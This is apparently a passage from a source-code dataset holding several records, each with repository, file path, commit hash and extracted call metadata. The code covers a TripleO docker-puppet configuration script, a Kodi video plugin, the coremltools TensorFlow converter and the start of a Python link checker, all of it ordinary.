FACTER_hostname=$HOSTNAME FACTER_uuid=docker /usr/bin/puppet apply --verbose $TAGS /etc/config.pp # Disables archiving if [ -z "$NO_ARCHIVE" ]; then archivedirs=("/etc" "/root" "/var/lib/ironic/tftpboot" "/var/lib/ironic/httpboot" "/var/www") rsync_srcs="" for d in "${archivedirs[@]}"; do if [ -d "$d" ]; then rsync_srcs+=" $d" fi done rsync -a -R --delay-updates --delete-after $rsync_srcs /var/lib/config-data/${NAME} # Also make a copy of files modified during puppet run # This is useful for debugging mkdir -p /var/lib/config-data/puppet-generated/${NAME} rsync -a -R -0 --delay-updates --delete-after \ --files-from=<(find $rsync_srcs -newer /etc/ssh/ssh_known_hosts -print0) \ / /var/lib/config-data/puppet-generated/${NAME} # Write a checksum of the config-data dir, this is used as a # salt to trigger container restart when the config changes tar -c -f - /var/lib/config-data/${NAME} --mtime='1970-01-01' | md5sum | awk '{print $1}' > /var/lib/config-data/${NAME}.md5sum fi """) with tempfile.NamedTemporaryFile() as tmp_man: with open(tmp_man.name, 'w') as man_file: man_file.write('include ::tripleo::packages\n') man_file.write(manifest) rm_container('docker-puppet-%s' % config_volume) pull_image(config_image) dcmd = ['/usr/bin/docker', 'run', '--user', 'root', '--name', 'docker-puppet-%s' % config_volume, '--env', 'PUPPET_TAGS=%s' % puppet_tags, '--env', 'NAME=%s' % config_volume, '--env', 'HOSTNAME=%s' % short_hostname(), '--env', 'NO_ARCHIVE=%s' % os.environ.get('NO_ARCHIVE', ''), '--env', 'STEP=%s' % os.environ.get('STEP', '6'), '--volume', '%s:/etc/config.pp:ro' % tmp_man.name, '--volume', '/etc/puppet/:/tmp/puppet-etc/:ro', '--volume', '/usr/share/openstack-puppet/modules/:/usr/share/openstack-puppet/modules/:ro', '--volume', '/var/lib/config-data/:/var/lib/config-data/:rw', '--volume', 'tripleo_logs:/var/log/tripleo/', # OpenSSL trusted CA injection '--volume', '/etc/pki/ca-trust/extracted:/etc/pki/ca-trust/extracted:ro', '--volume', '/etc/pki/tls/certs/ca-bundle.crt:/etc/pki/tls/certs/ca-bundle.crt:ro', '--volume', '/etc/pki/tls/certs/ca-bundle.trust.crt:/etc/pki/tls/certs/ca-bundle.trust.crt:ro', '--volume', '/etc/pki/tls/cert.pem:/etc/pki/tls/cert.pem:ro', # script injection '--volume', '%s:%s:rw' % (sh_script, sh_script) ] for volume in volumes: if volume: dcmd.extend(['--volume', volume]) dcmd.extend(['--entrypoint', sh_script]) env = {} # NOTE(flaper87): Always copy the DOCKER_* environment variables as # they contain the access data for the docker daemon. for k in filter(lambda k: k.startswith('DOCKER'), os.environ.keys()): env[k] = os.environ.get(k) if os.environ.get('NET_HOST', 'false') == 'true': log.debug('NET_HOST enabled') dcmd.extend(['--net', 'host', '--volume', '/etc/hosts:/etc/hosts:ro']) dcmd.append(config_image) log.debug('Running docker command: %s' % ' '.join(dcmd)) subproc = subprocess.Popen(dcmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env) cmd_stdout, cmd_stderr = subproc.communicate() if subproc.returncode != 0: log.error('Failed running docker-puppet.py for %s' % config_volume) if cmd_stdout: log.error(cmd_stdout) if cmd_stderr: log.error(cmd_stderr) else: if cmd_stdout: log.debug(cmd_stdout) if cmd_stderr: log.debug(cmd_stderr) # only delete successful runs, for debugging rm_container('docker-puppet-%s' % config_volume) return subproc.returncode # Holds all the information for each process to consume. # Instead of starting them all linearly we run them using a process # pool. This creates a list of arguments for the above function # to consume. process_map = [] for config_volume in configs: service = configs[config_volume] puppet_tags = service[1] or '' manifest = service[2] or '' config_image = service[3] or '' volumes = service[4] if len(service) > 4 else [] if puppet_tags: puppet_tags = "file,file_line,concat,augeas,%s" % puppet_tags else: puppet_tags = "file,file_line,concat,augeas" process_map.append([config_volume, puppet_tags, manifest, config_image, volumes]) for p in process_map: log.debug('- %s' % p) # Fire off processes to perform each configuration. Defaults # to the number of CPUs on the system. p = multiprocessing.Pool(process_count) returncodes = list(p.map(mp_puppet_config, process_map)) config_volumes = [pm[0] for pm in process_map] success = True for returncode, config_volume in zip(returncodes, config_volumes): if returncode != 0: log.error('ERROR configuring %s' % config_volume) success = False # Update the startup configs with the config hash we generated above config_volume_prefix = os.environ.get('CONFIG_VOLUME_PREFIX', '/var/lib/config-data') log.debug('CONFIG_VOLUME_PREFIX: %s' % config_volume_prefix) startup_configs = os.environ.get('STARTUP_CONFIG_PATTERN', '/var/lib/tripleo-config/docker-container-startup-config-step_*.json') log.debug('STARTUP_CONFIG_PATTERN: %s' % startup_configs) infiles = glob.glob('/var/lib/tripleo-config/docker-container-startup-config-step_*.json') for infile in infiles: with open(infile) as f: infile_data = json.load(f) for k, v in infile_data.iteritems(): config_volume = match_config_volume(config_volume_prefix, v) if config_volume: config_hash = get_config_hash(config_volume_prefix, config_volume) if config_hash: env = v.get('environment', []) env.append("TRIPLEO_CONFIG_HASH=%s" % config_hash) log.debug("Updating config hash for %s, config_volume=%s hash=%s" % (k, config_volume, config_hash)) infile_data[k]['environment'] = env outfile = os.path.join(os.path.dirname(infile), "hashed-" + os.path.basename(infile)) with open(outfile, 'w') as out_f: json.dump(infile_data, out_f) if not success: sys.exit(1)
[]
acitv/plugin.video.aci
main.py
c836096c90affd80949e51cd24517709a63eff52
# -*- coding: utf-8 -*- import sys import urllib import urlparse # import xbmc import xbmcgui import xbmcplugin import aci # Get the plugin url in plugin:// notation. _url = sys.argv[0] # Get the plugin handle as an integer number. _handle = int(sys.argv[1]) # Get an instance of ACI. ATV = aci.ACI() ATV.load_aci() # Encode user agent headers for video. user_agent_headers = urllib.urlencode({'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 ' 'Firefox/47.0 FirePHP/0.7.4', 'X-Requested-With': 'ShockwaveFlash/22.0.0.192' }) def get_url(**kwargs): """ Create a URL for calling the plugin recursively from the given set of keyword arguments. :param kwargs: "argument=value" pairs :type kwargs: dict :return: plugin call URL :rtype: str """ return '{0}?{1}'.format(_url, urllib.urlencode(kwargs)) def get_categories(): """ Get the list of video categories. Here you can insert some parsing code that retrieves the list of video categories (e.g. 'Movies', 'TV-shows', 'Documentaries' etc.) from some site or server. .. note:: Consider using `generator functions <https://wiki.python.org/moin/Generators>`_ instead of returning lists. :return: The list of video categories :rtype: types.GeneratorType """ return ATV.aci.iterkeys() def get_videos(category): """ Get the list of video files/streams. Here you can insert some parsing code that retrieves the list of video streams in the given category from some site or server. .. note:: Consider using `generators functions <https://wiki.python.org/moin/Generators>`_ instead of returning lists. :param category: Category name :type category: str :return: the list of videos in the category :rtype: list """ return ATV.aci[category] def list_categories(): """ Create the list of video categories in the Kodi interface. """ # Set plugin category. It is displayed in some skins as the name # of the current section. xbmcplugin.setPluginCategory(_handle, 'ACI') # Set plugin content. It allows Kodi to select appropriate views # for this type of content. xbmcplugin.setContent(_handle, 'videos') # Get video categories categories = get_categories() # Iterate through categories for category in categories: # xbmc.log(category.encode("utf-8"), xbmc.LOGNOTICE) # Create a list item with a text label and a thumbnail image. list_item = xbmcgui.ListItem(label=category.title()) # Set graphics (thumbnail, fanart, banner, poster, landscape etc.) for the list item. # Here we use the same image for all items for simplicity's sake. # In a real-life plugin you need to set each image accordingly. list_item.setArt({'thumb': "icon.png", 'icon': "icon.png", 'fanart': "icon.png"}) # Set additional info for the list item. # Here we use a category name for both properties for for simplicity's sake. # setInfo allows to set various information for an item. # For available properties see the following link: # https://codedocs.xyz/xbmc/xbmc/group__python__xbmcgui__listitem.html#ga0b71166869bda87ad744942888fb5f14 # 'mediatype' is needed for a skin to display info for this ListItem correctly. list_item.setInfo('video', {'title': category.title(), 'genre': category.title(), 'mediatype': 'video'}) # Create a URL for a plugin recursive call. # Example: plugin://plugin.video.example/?action=listing&category=[category name] url = get_url(action="listing", category=category) # is_folder = True means that this item opens a sub-list of lower level items. is_folder = True # Add our item to the Kodi virtual folder listing. xbmcplugin.addDirectoryItem(_handle, url, list_item, is_folder) # Add a sort method for the virtual folder items (alphabetically, ignore articles) xbmcplugin.addSortMethod(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE) # Finish creating a virtual folder. xbmcplugin.endOfDirectory(_handle) def list_videos(category): """ Create the list of playable videos in the Kodi interface. :param category: Category name :type category: str """ # Set plugin category. It is displayed in some skins as the name # of the current section. xbmcplugin.setPluginCategory(_handle, category) # Set plugin content. It allows Kodi to select appropriate views # for this type of content. xbmcplugin.setContent(_handle, 'videos') # Get the list of videos in the category. videos = get_videos(category) # Iterate through each video. for video_id in videos: # Get the video item to process. video_item = videos[video_id] # Create a list item with a text label and a thumbnail image. list_item = xbmcgui.ListItem(label=video_item["title"]) # Set additional info for the list item. # 'mediatype' is needed for skin to display info for this ListItem correctly. list_item.setInfo('video', {'title': video_item["title"], 'genre': category.title(), 'mediatype': 'video'}) # Set graphics (thumbnail, fanart, banner, poster, landscape etc.) for the list item. # Here we use the same image for all items for simplicity's sake. # In a real-life plugin you need to set each image accordingly. list_item.setArt({'thumb': video_item["thumbnail"], 'icon': video_item["thumbnail"], 'fanart': video_item["thumbnail"] }) # Set 'IsPlayable' property to 'true'. # This is mandatory for playable items! list_item.setProperty('IsPlayable', 'true') referer_header = urllib.urlencode({"Referer": video_item["location"]}) video_item['url'] += '|%s&amp;%s' % (user_agent_headers, referer_header) # Create a URL for a plugin recursive call. # Example: plugin://plugin.video.example/?action=play& # video=[video url] url = get_url(action='play', video=video_item['url']) # video_url = 'plugin://plugin.video.f4mTester/?url=' + urllib.quote_plus(video['video']) + \ # '&amp;streamtype=HLSRETRY&name=' + urllib.quote_plus(video['name']) + \ # '&amp;|User-Agent=Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 ' \ # 'FirePHP/0.7.4&amp;X-Requested-With=ShockwaveFlash/22.0.0.192&amp;Referer=' + \ # urllib.quote_plus(video['reference']) # url = get_url(action='play', video=video_url) # Add the list item to a virtual Kodi folder. # is_folder = False means that this item won't open any sub-list. is_folder = False # Add our item to the Kodi virtual folder listing. xbmcplugin.addDirectoryItem(_handle, url, list_item, is_folder) # Add a sort method for the virtual folder items (alphabetically, ignore articles) xbmcplugin.addSortMethod(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE) # Finish creating a virtual folder. xbmcplugin.endOfDirectory(_handle) def play_video(path): """ Play a video by the provided path. :param path: Fully-qualified video URL :type path: str """ # Create a playable item with a path to play. play_item = xbmcgui.ListItem(path=path) # Play with inputstream addon. play_item.setProperty('inputstreamaddon', 'inputstream.adaptive') play_item.setProperty('inputstream.adaptive.manifest_type', 'hls') # Pass the item to the Kodi player. xbmcplugin.setResolvedUrl(_handle, True, listitem=play_item) def router(paramstring): """ Router function that calls other functions depending on the provided paramstring :param paramstring: URL encoded plugin paramstring :type paramstring: str """ # Parse a URL-encoded paramstring to the dictionary of # {<parameter>: <value>} elements params = dict(urlparse.parse_qsl(paramstring)) # Check the parameters passed to the plugin if params: if params['action'] == 'listing': # Load the videos for aci. if params['category'] == "shows": ATV.update_aci_shows() print("Updated from main shows.") elif params['category'] == "cable": ATV.update_aci_cable() print("Updated from main cable.") elif params['category'] == "movies": ATV.update_aci_movies() print("Updated from main movies.") # Display the list of videos in a provided category. list_videos(params['category']) elif params['action'] == 'play': # Play a video from a provided URL. play_video(params['video']) else: # If the provided paramstring does not contain a supported action # we raise an exception. This helps to catch coding errors, # e.g. typos in action names. raise ValueError('Invalid paramstring: {0}!'.format(paramstring)) else: # Load ATV. ATV.load_aci() # If the plugin is called from Kodi UI without any parameters, # display the list of video categories list_categories() if __name__ == '__main__': # Call the router function and pass the plugin call parameters to it. # We use string slicing to trim the leading '?' from the plugin call paramstring router(sys.argv[2][1:])
[((19, 6, 19, 15), 'aci.ACI', 'aci.ACI', ({}, {}), '()', False, 'import aci\n'), ((23, 21, 26, 41), 'urllib.urlencode', 'urllib.urlencode', ({(23, 38, 26, 40): "{'User-Agent':\n 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 FirePHP/0.7.4'\n , 'X-Requested-With': 'ShockwaveFlash/22.0.0.192'}"}, {}), "({'User-Agent':\n 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 FirePHP/0.7.4'\n , 'X-Requested-With': 'ShockwaveFlash/22.0.0.192'})", False, 'import urllib\n'), ((82, 4, 82, 48), 'xbmcplugin.setPluginCategory', 'xbmcplugin.setPluginCategory', ({(82, 33, 82, 40): '_handle', (82, 42, 82, 47): '"""ACI"""'}, {}), "(_handle, 'ACI')", False, 'import xbmcplugin\n'), ((85, 4, 85, 44), 'xbmcplugin.setContent', 'xbmcplugin.setContent', ({(85, 26, 85, 33): '_handle', (85, 35, 85, 43): '"""videos"""'}, {}), "(_handle, 'videos')", False, 'import xbmcplugin\n'), ((123, 4, 123, 78), 'xbmcplugin.addSortMethod', 'xbmcplugin.addSortMethod', ({(123, 29, 123, 36): '_handle', (123, 38, 123, 77): 'xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE'}, {}), '(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)', False, 'import xbmcplugin\n'), ((125, 4, 125, 38), 'xbmcplugin.endOfDirectory', 'xbmcplugin.endOfDirectory', ({(125, 30, 125, 37): '_handle'}, {}), '(_handle)', False, 'import xbmcplugin\n'), ((137, 4, 137, 51), 'xbmcplugin.setPluginCategory', 'xbmcplugin.setPluginCategory', ({(137, 33, 137, 40): '_handle', (137, 42, 137, 50): 'category'}, {}), '(_handle, category)', False, 'import xbmcplugin\n'), ((140, 4, 140, 44), 'xbmcplugin.setContent', 'xbmcplugin.setContent', ({(140, 26, 140, 33): '_handle', (140, 35, 140, 43): '"""videos"""'}, {}), "(_handle, 'videos')", False, 'import xbmcplugin\n'), ((192, 4, 192, 78), 'xbmcplugin.addSortMethod', 'xbmcplugin.addSortMethod', ({(192, 29, 192, 36): '_handle', (192, 38, 192, 77): 'xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE'}, {}), '(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)', False, 'import xbmcplugin\n'), ((194, 4, 194, 38), 'xbmcplugin.endOfDirectory', 'xbmcplugin.endOfDirectory', ({(194, 30, 194, 37): '_handle'}, {}), '(_handle)', False, 'import xbmcplugin\n'), ((205, 16, 205, 43), 'xbmcgui.ListItem', 'xbmcgui.ListItem', (), '', False, 'import xbmcgui\n'), ((212, 4, 212, 64), 'xbmcplugin.setResolvedUrl', 'xbmcplugin.setResolvedUrl', (), '', False, 'import xbmcplugin\n'), ((38, 34, 38, 58), 'urllib.urlencode', 'urllib.urlencode', ({(38, 51, 38, 57): 'kwargs'}, {}), '(kwargs)', False, 'import urllib\n'), ((120, 8, 120, 71), 'xbmcplugin.addDirectoryItem', 'xbmcplugin.addDirectoryItem', ({(120, 36, 120, 43): '_handle', (120, 45, 120, 48): 'url', (120, 50, 120, 59): 'list_item', (120, 61, 120, 70): 'is_folder'}, {}), '(_handle, url, list_item, is_folder)', False, 'import xbmcplugin\n'), ((150, 20, 150, 63), 'xbmcgui.ListItem', 'xbmcgui.ListItem', (), '', False, 'import xbmcgui\n'), ((170, 25, 170, 78), 'urllib.urlencode', 'urllib.urlencode', ({(170, 42, 170, 77): "{'Referer': video_item['location']}"}, {}), "({'Referer': video_item['location']})", False, 'import urllib\n'), ((189, 8, 189, 71), 'xbmcplugin.addDirectoryItem', 'xbmcplugin.addDirectoryItem', ({(189, 36, 189, 43): '_handle', (189, 45, 189, 48): 'url', (189, 50, 189, 59): 'list_item', (189, 61, 189, 70): 'is_folder'}, {}), '(_handle, url, list_item, is_folder)', False, 'import xbmcplugin\n'), ((225, 18, 225, 49), 'urlparse.parse_qsl', 'urlparse.parse_qsl', ({(225, 37, 225, 48): 'paramstring'}, {}), '(paramstring)', False, 'import urlparse\n')]
VadimLevin/coremltools
coremltools/converters/mil/frontend/tensorflow/converter.py
66c17b0fa040a0d8088d33590ab5c355478a9e5c
# Copyright (c) 2020, Apple Inc. All rights reserved. # # Use of this source code is governed by a BSD-3-clause license that can be # found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause import logging from coremltools.converters.mil.input_types import ( InputType, TensorType, ImageType, RangeDim, _get_shaping_class, ) from coremltools.converters.mil.input_types import Shape as InputShape from coremltools.converters.mil.mil.var import Var from coremltools.converters.mil.mil import get_new_symbol from coremltools.converters.mil.mil.types.symbolic import is_symbolic from coremltools.converters.mil.mil.types import is_tensor from coremltools.converters.mil.mil import types from .basic_graph_ops import topsort, simple_topsort from .convert_utils import convert_graph from coremltools.converters.mil.mil import Builder as mb from coremltools.converters.mil.mil import Program from coremltools.converters.mil.mil import Function from .ssa_passes.tf_passes import tensorflow_passes from coremltools.converters._profile_utils import _profile # TranscriptionContext maintains a map of tf_node.name --> ssa_var available # to the current TF --> tfssa transcription. class TranscriptionContext: def __init__(self, name=None): self.name = name if name is not None else "" self.context = {} self.graphs = {} # TF loops are represented as functions, so nested loops becomes # stacked functions. Stacked functions are translated to nested # blocks in Program, like # # while_loop(loop_vars=(%a, %b)) # cond_block1(%a.x, %b.x) { # ...some ops # } -> (%bool_var1) # body_block1(%a.x, %b.x) { # %ret_axx = while_loop(loop_vars=(%a.x,)) # cond_block2(%a.x.x) { # ...some ops # } -> (%bool_var2) # body_block2(%a.x.x) { # ...some ops # } -> (%new_a.x.x) # } -> (%ret_axx) # ....some ops using %ret_a # } -> (%ret_ax, %ret_bx) # # During the translation of cond_block2, we'd have func_input_stack # # (%a.x.x,) # (%a.x, %b.x) # # where [%a.x.x] would be unstacked once cond_block2 is done. self.func_input_stack = [] # list of tuple[Var] def add(self, tf_name, ssa_vars, is_new_var=True): """ ssa_vars: list[Var] / tuple[Var] (multiple outputs) or Var (single_output) is_new_var: True if ssa_vars are newly created for tf_name. """ if tf_name in self.context: # Overriding allow us to translate while_loop body twice (which is # needed to figure out shapes changes during iterates) msg = "TF var %s is added again. Overriding previous value" logging.info(msg % tf_name) if is_new_var and isinstance(ssa_vars, Var) and tf_name != ssa_vars.name: msg = ( "MIL op's name ({}) does not match TensorFlow's node name ({})." " Warning: Node added to context must have the same name as the name passed to context." ) raise ValueError(msg.format(tf_name, ssa_vars.name)) self.context[tf_name] = ssa_vars def add_graph(self, graph_name, graph): self.graphs[graph_name] = graph def get_graph(self, graph_name): if graph_name not in self.graphs: msg = "Graph '{}' not found in: {}" raise KeyError(msg.format(graph_name, list(self.graphs.keys()))) return self.graphs[graph_name] def stack_func_inputs(self, inputs): self.func_input_stack.append(inputs) def unstack_func_inputs(self): if len(self.func_input_stack) == 0: raise ValueError("No func input available") self.func_input_stack.pop() def get_func_inputs(self): if len(self.func_input_stack) == 0: raise ValueError("No func input available") return self.func_input_stack[-1] def __getitem__(self, tf_name): if tf_name not in self.context: msg = "TF var {} not found in context {}" raise KeyError(msg.format(tf_name, self.name)) return self.context[tf_name] def __contains__(self, tf_name): return tf_name in self.context class TFConverter: def __init__(self, tfssa, inputs=None, outputs=None, **kwargs): """ tfssa: TensorFlow IR. inputs: list of TensorType or ImageType, optional, defaults to None. outputs: list of str or str, optional, defaults to None. A list of names of the output nodes or a str for single output name. If None, the converter will try to extract the output information from TensorFlow model. """ self.tfssa = tfssa self.global_type = {} self.inputs = None main_func = tfssa.functions["main"] graph = main_func.graph # Filter the inputs to only Placeholder names tf_placeholder_names = [n for n in graph if graph[n].op == "Placeholder"] placeholder_names = [] if inputs is not None: # Check inputs format if not isinstance(inputs, (list, tuple)): raise ValueError( "Type of inputs should be list or tuple, got {} instead.".format( type(inputs) ) ) if not all([isinstance(i, InputType) for i in inputs]): raise ValueError( "Type of inputs should be list or tuple of TensorType or ImageType, got {} instead.".format( [type(i) for i in inputs] ) ) # Special case: if there's only 1 input and 1 placeholder, we match them. if len(tf_placeholder_names) == 1 and len(inputs) == 1: if inputs[0].name is None: inputs[0].name = tf_placeholder_names[0] # filter out those inputs which is not in tf_placeholder_names inputs = [x for x in inputs if x.name in tf_placeholder_names] # We fill in shapes for user-specified input that doesn't have shape for inp in inputs: # Check inputs existence if inp.name is None: raise ValueError( "Unable to infer input's name or input name was not provided" ) if inp.name not in tf_placeholder_names: raise ValueError( "Input ({}) provided is not found in given tensorflow graph. Placeholders in graph are: {}".format( inp.name, tf_placeholder_names ) ) if inp.shape is None: shape = self._get_placeholder_shape_from_tf_graph(tfgraph=graph, name=inp.name) # _get_shaping_class does not accept -1 or None dimension. shape = [get_new_symbol() if s is None or s == -1 else s \ for s in shape] inp.shape = _get_shaping_class(shape) # Extract placeholders that users didn't specify. user_input_names = [inp.name for inp in inputs] for name in tf_placeholder_names: if name not in user_input_names: placeholder_names.append(name) else: inputs = [] placeholder_names = tf_placeholder_names # name -> (shape, mil_type) mapping. shape has type list[int] added_inputs = {} for inp in main_func.inputs: if inp not in placeholder_names: continue node = graph[inp] dtype = node.attr['dtype'] shape = self._get_placeholder_shape_from_tf_graph(tfgraph=graph, name=inp) shape = [get_new_symbol() if s is None or s == -1 else s \ for s in shape] inputs.append(TensorType(name=inp, shape=shape, dtype=dtype)) added_inputs[inp] = (shape, dtype) if len(added_inputs) > 0: logging.info( "Adding Input not specified by users: '{}'".format( added_inputs) ) for idx, inp in enumerate(inputs): # We set the default image format in TF as NHWC, since NHWC is used # for TF unless GPU is specified as device. if isinstance(inp, ImageType) and inputs[idx].channel_first is None: inputs[idx].channel_first = False self.inputs = tuple(inputs) for inputtype in self.inputs: if not isinstance(inputtype.shape, InputShape): continue if any([isinstance(s, RangeDim) for s in inputtype.shape.shape]): continue node = graph[inputtype.name] shape = [-1 if is_symbolic(s) else s for s in inputtype.shape.shape] node.attr["_output_shapes"] = [shape] # list of length 1 # infer outputs if not provided self._validate_outputs(tfssa, outputs) outputs = main_func.outputs if outputs is None else outputs outputs = outputs if isinstance(outputs, (tuple, list)) else [outputs] outputs = [x if isinstance(x, str) else x.name for x in outputs] self.outputs = outputs # We would like a stack so that we run conversion sequentially. self.graph_stack = self._get_stack(tfssa, root="main") self.context = TranscriptionContext() self.tensorflow_passes = tensorflow_passes def _get_placeholder_shape_from_tf_graph(self, tfgraph, name): error_message = "Unable to determine the shape of input: {}." \ " Please provide its shape during conversion, using \n" \ "'ct.convert(..., inputs=[ct.TensorType(name='{}', shape=(_FILL_ME_) ),])".format(name, name) if tfgraph[name].attr.get("shape", None) is not None: shape = tfgraph[name].attr["shape"] elif tfgraph[name].attr.get("_output_shapes", None) is not None: shape = tfgraph[name].attr["_output_shapes"][0] if shape is None: raise ValueError(error_message) else: raise ValueError(error_message) return shape def _get_stack(self, tfssa, root="main"): # We're trying to get a order of how to loop through the graphs. # This is NOT necessarily a DAG. dep = {x: [] for x in tfssa.functions} for fname in tfssa.functions: for node in tfssa.functions[fname].graph.values(): func_x, func_y = None, None if node.op == "while": func_x = node.attr["body_function"] func_y = node.attr["cond_function"] if func_x and fname not in dep[func_x]: dep[func_x].append(fname) if func_y and fname not in dep[func_y]: dep[func_y].append(fname) assert len(dep[root]) == 0 graph_stack = simple_topsort(dep) return graph_stack @staticmethod def _get_tensor_name(tensor): ret = None if isinstance(tensor, str): ret = tensor else: ret = tensor.name return ret.split(":")[0] def _validate_outputs(self, tfssa, outputs): if outputs is None: return outputs = outputs if isinstance(outputs, (tuple, list)) else [outputs] output_nodes = [] for f in tfssa.functions.values(): output_nodes += list(f.outputs) all_nodes = [] for f in tfssa.functions.values(): all_nodes += list(f.graph.keys()) for n in outputs: if self._get_tensor_name(n) not in output_nodes + all_nodes: raise KeyError('Output node name "{}" does exist.'.format(n)) def check_placeholder_output(self, prog, outputs_name): """ Handle the cases where placeholder is output. There is a case where the program is like main(%Placeholder: (5,fp32)) { block3() { } -> (%Placeholder) } But self.outputs = ["Placeholder:0"] We need to change the block output to Placeholder:0 by inserting an identity """ block = prog["main"] input_name = [x.name for x in list(block.inputs.values())] with block: new_outputs = [] for output, output_name in zip(block.outputs, outputs_name): if output.name not in input_name or output.name == output_name: new_output = output else: new_output = mb.identity(x=output, name=output_name) new_outputs.append(new_output) block.set_outputs(new_outputs) def convert_main_graph(self, prog, graph): func_inputs = {} for input_type in self.inputs: func_inputs[input_type.name] = mb.placeholder( input_type.shape.symbolic_shape, dtype=input_type.dtype) prog.set_main_input_types(self.inputs) with Function(func_inputs) as ssa_func: # Get the input Var for name in func_inputs.keys(): self.context.add(name, ssa_func.inputs[name]) outputs = convert_graph(self.context, graph, self.outputs) ssa_func.set_outputs(outputs) prog.add_function("main", ssa_func) # check duplicate output # Note: sometimes two outputs are pointing to the same Var, we should # create mb.identity for those cases block = prog["main"] with block: name_counts = {} new_outputs = [output for output in block.outputs] for i, v_o in enumerate(block.outputs): if v_o.name not in name_counts: name_counts[v_o.name] = 1 else: name_counts[v_o.name] += 1 new_name = v_o.name + "_duplicate_" + str(name_counts[v_o.name]) x = mb.identity(x=v_o, name=new_name) new_outputs[i] = x block.set_outputs(new_outputs) # Rename outputs to TF's name. This is needed when the last op doesn't # generate a new Var (e.g., get_tuple, Identity etc.), and thus the # last Var would have a different name than the last TF op's name. # # Example: # # TF code: # x = tf.placeholder(tf.float32, shape=(1,)) # y = tf.placeholder(tf.float32, shape=(1,)) # c = lambda i, j: \ # tf.less(tf.math.reduce_mean(i), tf.math.reduce_mean(j)) # b = lambda i, j: (tf.add(i, 1), j) # res = tf.while_loop(c, b, [x, y]) # # Resulting nodes (excluding the nodes in while loop cond & body): # # node name: Placeholder op type: Placeholder inputs: [] # node name: Placeholder_1 op type: Placeholder inputs: [] # node name: make_input_0 op type: make_tuple inputs: ['Placeholder', # 'Placeholder_1'] # node name: while_0 op type: while inputs: ['make_input_0'] # node name: while/Exit op type: get_tuple inputs: ['while_0'] # node name: while/Exit_1 op type: get_tuple inputs: ['while_0'] # # Observe that return node `while/Exit` is an output from get_tuple, # which in our translation simply unpack a python tuple of Vars # ('while_0:0', 'while_0:1') returned from while_0 SSA op. We need to # rename `while_0:0` to `while/Exit` in order for users to find the # output. # Note: only rename the output if the output is not Placeholder. input_names = [x.name for x in self.inputs] for v_o, out_name in zip(prog["main"].outputs, self.outputs): if v_o.name != out_name and v_o.name not in input_names: logging.info( "Renaming output var: '{}' -> '{}'".format(v_o.name, out_name) ) v_o.name = out_name self.check_placeholder_output(prog, self.outputs) @_profile def convert(self): prog = Program() if len(self.graph_stack) == 0: raise ValueError("At least one TF function must be present") if self.graph_stack[0] != "main": msg = "TF root graph must be named 'main'. Got {}" raise ValueError(msg.format(self.graph_stack[0])) graph = self.tfssa.functions["main"].graph for g_name in self.graph_stack[1:]: self.context.add_graph(g_name, self.tfssa.functions[g_name].graph) self.convert_main_graph(prog, graph) # Apply TF frontend passes on Program. These passes are different # from passes applied to tfssa. self.tensorflow_passes(prog) return prog
[((397, 15, 397, 24), 'coremltools.converters.mil.mil.Program', 'Program', ({}, {}), '()', False, 'from coremltools.converters.mil.mil import Program\n'), ((78, 12, 78, 39), 'logging.info', 'logging.info', ({(78, 25, 78, 38): '(msg % tf_name)'}, {}), '(msg % tf_name)', False, 'import logging\n'), ((327, 43, 328, 76), 'coremltools.converters.mil.mil.Builder.placeholder', 'mb.placeholder', (), '', True, 'from coremltools.converters.mil.mil import Builder as mb\n'), ((331, 13, 331, 34), 'coremltools.converters.mil.mil.Function', 'Function', ({(331, 22, 331, 33): 'func_inputs'}, {}), '(func_inputs)', False, 'from coremltools.converters.mil.mil import Function\n'), ((201, 26, 201, 72), 'coremltools.converters.mil.input_types.TensorType', 'TensorType', (), '', False, 'from coremltools.converters.mil.input_types import InputType, TensorType, ImageType, RangeDim, _get_shaping_class\n'), ((180, 32, 180, 57), 'coremltools.converters.mil.input_types._get_shaping_class', '_get_shaping_class', ({(180, 51, 180, 56): 'shape'}, {}), '(shape)', False, 'from coremltools.converters.mil.input_types import InputType, TensorType, ImageType, RangeDim, _get_shaping_class\n'), ((199, 21, 199, 37), 'coremltools.converters.mil.mil.get_new_symbol', 'get_new_symbol', ({}, {}), '()', False, 'from coremltools.converters.mil.mil import get_new_symbol\n'), ((223, 27, 223, 41), 'coremltools.converters.mil.mil.types.symbolic.is_symbolic', 'is_symbolic', ({(223, 39, 223, 40): 's'}, {}), '(s)', False, 'from coremltools.converters.mil.mil.types.symbolic import is_symbolic\n'), ((320, 33, 320, 72), 'coremltools.converters.mil.mil.Builder.identity', 'mb.identity', (), '', True, 'from coremltools.converters.mil.mil import Builder as mb\n'), ((351, 24, 351, 57), 'coremltools.converters.mil.mil.Builder.identity', 'mb.identity', (), '', True, 'from coremltools.converters.mil.mil import Builder as mb\n'), ((178, 29, 178, 45), 'coremltools.converters.mil.mil.get_new_symbol', 'get_new_symbol', ({}, {}), '()', False, 'from coremltools.converters.mil.mil import get_new_symbol\n')]
clayball/pylinkcheck
pylinkcheck.py
085e5562525bebc77b8ebfd3b0fb676b01f4be68
#!/usr/bin/env python # Copyright (c) 2016 Clay Wells # # A Python-based link checker. # # Usage: pylinkcheck.py -r https://www.example.com # # By default, we can spider and check all of the links found at the URL's # domain. For example, a check of https://foo.example.com will only check # links with the base URL path of foo.example.com. Link found to # bar.example.com will not be checked. # # Fancy run-time options # url root (domain): this is simply required # generate report file: -o output.txt, --output=output.txt # limit depth: -l 2, --limit=2 # TODO: report format: --format=txt,html,xml ############################################################################## import argparse import urllib2 import csv from datetime import datetime import re from urlparse import urlparse from bs4 import BeautifulSoup ####################################### # Functions # Spider the base URL def spiderURL(baseurl, pathlimit): # build a list based on each sub directory found print '[spider] path limit set to %d' % pathlimit # Print an informative summary of the dead links def printReport(deadlinks): # print each item in the deadlinks list or CLEAN if empty print '\n\n' 